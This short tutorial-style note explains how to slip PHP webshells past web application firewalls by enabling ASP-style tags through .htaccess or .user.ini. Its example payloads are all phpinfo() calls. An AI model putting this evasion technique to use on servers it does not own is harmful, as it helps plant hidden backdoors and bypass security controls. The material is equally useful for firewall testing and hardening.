most wafs detect webshell using php tags check

1
<?php phpinfo();?>

or short tags

1
<?phpinfo();?>

normal way

1
<script language='php'>phpinfo()</script>

but sometimes it would fail too

how could we find another way?

see php document

http://php.net/manual/en/language.basic-syntax.phptags.php

1
7.0.0 The ASP tags <%, %>, <%=, and the script tag <script language="php"> are removed from PHP.

it is disabled by default

but .htaccess and .user.ini file allow us to define some php variables

http://www.php.net/manual/en/ini.list.php

1
PHP_INI_PERDIR:could be defined in php.ini httpd.conf or .htaccess

in apache

use .htaccess file

1
2
#example
php_value asp_tags on

although the document just talk about .htaccess

as a matter of fact , .user.ini also make sense in nginx server

1
asp_tags = On

so that this kind of webshell could be used

1
<% phpinfo();%>